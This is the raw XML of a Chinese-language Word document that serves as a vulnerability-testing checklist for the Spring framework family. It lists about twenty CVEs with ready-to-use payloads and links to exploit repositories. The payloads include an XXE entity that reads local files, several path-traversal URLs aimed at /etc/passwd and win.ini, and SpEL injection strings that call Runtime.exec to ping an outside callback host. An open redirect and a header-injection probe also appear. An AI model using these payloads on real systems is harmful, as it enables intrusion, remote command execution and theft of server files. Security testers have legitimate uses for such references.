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0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pring框架漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞描述：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auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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</w:rPr>
        <w:t>Spring框架漏洞，包含Spring Framework，Spring Boot，还有Spring Cloud，Spring Data，Spring Security等。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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自从引入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</w:rPr>
        <w:t>SpEL表达式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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，Spring也被发现了很多命令执行漏洞。可参考 https://github.com/vulhub/vulhub/tree/master/spring。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>漏洞场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>框架全家桶。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Style w:val="9"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.example.com。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞级别：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>高危。</w:t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漏洞测试：</w:t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</w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/scopion/SpringScan，https:/github.com/scopion/SpringBootVulExploit，" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/scopion/SpringScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，https://github.com/scopion/SpringBootVulExploit，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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cve-2010-1622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:利用条件复杂见 cve-2010-1622.docx，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia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CVE-2013-4152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7580" cy="1840230"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:docPr id="6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&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///bin/bash"&gt;]&gt;&lt;user&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;name&gt;admin&lt;/name&gt;&lt;/user&gt;</w:t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CVE-2014-3578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：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="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/springapp/css/file:/etc/passwd</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5752465" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="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eastAsia"/>
        </w:rPr>
        <w:t>CVE-2016-2173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/scopion/CVE-2016-2173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CVE-2016-4977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"https://github.com/scopion/vulhub/blob/master/spring/CVE-2016-4977/README.zh-cn.md"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https://github.com/scopion/vulhub/blob/master/spring/CVE-2016-4977/README.zh-cn.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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CNVD-2016-04742</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：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http://domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/?pa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}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FBB204A4061FFBD41284A84C258C1BFB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返回结果是md5(wooyun)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CVE-2017-4971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"https://github.com/vulhub/vulhub/blob/4d17ab2d4df39eefad5c498c5aa60b036a05494d/spring/CVE-2017-4971/README.md"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https://github.com/vulhub/vulhub/blob/4d17ab2d4df39eefad5c498c5aa60b036a05494d/spring/CVE-2017-4971/README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after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51830" cy="3165475"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="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0"/>
        <w:ind w:firstLine="48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&amp;_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader("vulnerable","True").aaa=n1nty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CVE-2017-8045</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2017-8045</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.pdf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CVE-2017-8046：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"https://github.com/scopion/vulhub/tree/master/spring/CVE-2017-8046"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https://github.com/scopion/vulhub/tree/master/spring/CVE-2017-8046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CVE-2018-1270：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"https://github.com/scopion/vulhub/tree/master/spring/CVE-2018-1270"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https://github.com/scopion/vulhub/tree/master/spring/CVE-2018-1270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CVE-2018-1271,windows服务器环境,静态目录路径：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7"/>
        </w:rPr>
        <w:t>http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini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CVE-2018-1273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"https://github.com/scopion/vulhub/tree/master/spring/CVE-2018-1273"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https://github.com/scopion/vulhub/tree/master/spring/CVE-2018-1273</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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CVE-2018-1260</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：先访问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US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/oauth/authorize?client_id=client&amp;response_type=code&amp;redirect_uri=http://www.github.com/chybeta&amp;scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec</w:t>
      </w:r>
      <w:r>
        <w:t>%28%22ping%20r9rub4.ceye.io%22%29%7D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随意输入账号密码即可成功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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2019-3799</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve">/..%252f..%252f..%252f..%252f../etc/passwd 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CVE-2019-3778</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：输入重定向地址</w:t>
      </w:r>
      <w:r>
        <w:t>http://%localhost:8086/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>即可任意重定向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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CNVD-2019-11630</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:见CNVD-2019-11630.docx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CVE-2020-5405</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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</w:pPr>
      <w:r>
        <w:t>http://127.0.0.1:8888/1/1/..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)..(_)etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>http://127.0.0.1:8888/1/1/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29etc/passwd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CVE-2020-54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10：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curl "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"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12AFFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF12AFF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06E87"/>
    <w:rsid w:val="17CB4FD4"/>
    <w:rsid w:val="1A6C7DC3"/>
    <w:rsid w:val="2D706E87"/>
    <w:rsid w:val="3408753A"/>
    <w:rsid w:val="36A32887"/>
    <w:rsid w:val="385B503B"/>
    <w:rsid w:val="53A25D0F"/>
    <w:rsid w:val="689B1FB1"/>
    <w:rsid w:val="77EE4825"/>
    <w:rsid w:val="7E3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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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after="0"/>
      <w:ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs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color w:val="auto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5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customStyle="1" w:styleId="8">
    <w:name w:val="样式标题 Char"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="样式小标题 Char"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="样式小标题"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="样式标题"/>
    <w:basedOn w:val="10"/>
    <w:link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2021-10-18T03:38:00Z</dcterms:created>
  <dc:creator>bingjie</dc:creator>
  <cp:lastModifiedBy>bingjie</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-18T07:32:54Z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FD104507A0F148BCBEE0831D80365E1A</vt:lpwstr>
  </property>
</Properties>
</file>